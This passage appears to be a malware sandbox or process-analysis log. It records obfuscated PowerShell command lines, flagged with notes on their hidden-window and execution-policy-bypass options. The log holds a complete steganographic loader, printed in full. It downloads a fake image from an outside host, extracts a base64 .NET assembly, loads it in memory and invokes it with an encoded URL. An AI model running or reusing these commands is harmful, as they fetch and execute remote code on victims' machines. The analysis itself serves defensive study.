MgOCckxtWMgOIkxtWMgOkxtWMgOskxtWMgOCkxtWMgOkxtWMgOJwBkkxtWMgOGYkxtWMgOZkxtWMgOBmkxtWMgOCckxtWMgOIkxtWMgOkxtWMgOskxtWMgOCkxtWMgOkxtWMgOJwBkkxtWMgOGYkxtWMgOZkxtWMgOBmkxtWMgOCckxtWMgOIkxtWMgOkxtWMgOskxtWMgOCkxtWMgOkxtWMgOJwBkkxtWMgOGEkxtWMgOZkxtWMgOBzkxtWMgOGEkxtWMgOJwkxtWMgOgkxtWMgOCwkxtWMgOIkxtWMgOkxtWMgOnkxtWMgOGQkxtWMgOZQkxtWMgOnkxtWMgOCkxtWMgOkxtWMgOLkxtWMgOkxtWMgOgkxtWMgOCckxtWMgOYwB1kxtWMgOCckxtWMgOKQkxtWMgOpkxtWMgOkxtWMgO==';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('kxtWMgO','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
parent_process powershell.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/634/676/original/rumpe.jpg?1697053529';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LjQ2ZXNhYmVsaWZkZXRhZHB1ZGlvcmRkZW1tYWhvbS80NzEuNzMuNDUyLjU4MS8vOnB0dGg=' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"
option -executionpolicy bypass value Attempts to bypass execution policy
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
option -executionpolicy bypass value Attempts to bypass execution policy
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
option -executionpolicy bypass value Attempts to bypass execution policy
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe